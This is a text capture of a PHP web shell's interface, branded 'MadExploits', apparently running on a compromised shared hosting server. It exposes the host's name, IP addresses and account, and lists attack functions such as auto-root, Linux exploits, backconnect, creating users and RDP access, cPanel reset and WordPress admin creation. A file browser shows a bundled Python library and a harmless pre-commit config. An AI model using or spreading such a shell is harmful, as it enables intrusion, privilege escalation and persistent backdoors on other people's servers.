Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
requests /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.coveragerc
33
B
-rw-r--r--
.git-blame-ignore-revs
234
B
-rw-r--r--
.gitignore
321
B
-rw-r--r--
.pre-commit-config.yaml
593
B
-rw-r--r--
.readthedocs.yaml
738
B
-rw-r--r--
AUTHORS.rst
7.85
KB
-rw-r--r--
HISTORY.md
58.95
KB
-rw-r--r--
LICENSE
9.9
KB
-rw-r--r--
MANIFEST.in
126
B
-rw-r--r--
Makefile
815
B
-rw-r--r--
NOTICE
38
B
-rw-r--r--
README.md
2.86
KB
-rw-r--r--
pyproject.toml
238
B
-rw-r--r--
requirements-dev.txt
92
B
-rw-r--r--
setup.cfg
350
B
-rw-r--r--
setup.py
3.85
KB
-rw-r--r--
tox.ini
283
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .pre-commit-config.yaml
exclude: 'docs/|ext/' repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v4.4.0 hooks: - id: check-yaml - id: debug-statements - id: end-of-file-fixer - id: trailing-whitespace - repo: https://github.com/PyCQA/isort rev: 5.12.0 hooks: - id: isort - repo: https://github.com/psf/black rev: 23.7.0 hooks: - id: black exclude: tests/test_lowlevel.py - repo: https://github.com/asottile/pyupgrade rev: v3.10.1 hooks: - id: pyupgrade args: [--py37-plus] - repo: https://github.com/PyCQA/flake8 rev: 6.1.0 hooks: - id: flake8
Close